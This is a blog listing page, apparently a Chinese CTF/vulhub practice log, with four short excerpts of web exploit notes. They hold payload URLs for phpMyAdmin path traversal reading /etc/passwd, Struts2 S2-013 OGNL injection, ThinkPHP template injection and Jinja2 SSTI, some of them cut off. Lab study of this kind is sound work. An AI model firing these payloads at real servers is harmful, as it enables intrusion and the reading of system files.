摘要: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 在sql里面执行 SELECT '<?=phpinfo()?>'; http://node4.buuoj.cn:26180/ 阅读全文
posted @ 2022-07-23 19:26 kubopiy 阅读(53) 评论(0) 推荐(0) 编辑
摘要: https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md link.action?a=%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3 阅读全文
posted @ 2022-07-23 18:21 kubopiy 阅读(43) 评论(0) 推荐(0) 编辑
摘要: http://node4.buuoj.cn:28677/index.php?s=/index/index/name/$%7B@phpinfo()%7D 阅读全文
posted @ 2022-07-23 17:19 kubopiy 阅读(123) 评论(0) 推荐(0) 编辑
摘要: 得到54289,说明SSTI漏洞存在 http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20 阅读全文
posted @ 2022-07-23 17:12 kubopiy 阅读(224) 评论(0) 推荐(0) 编辑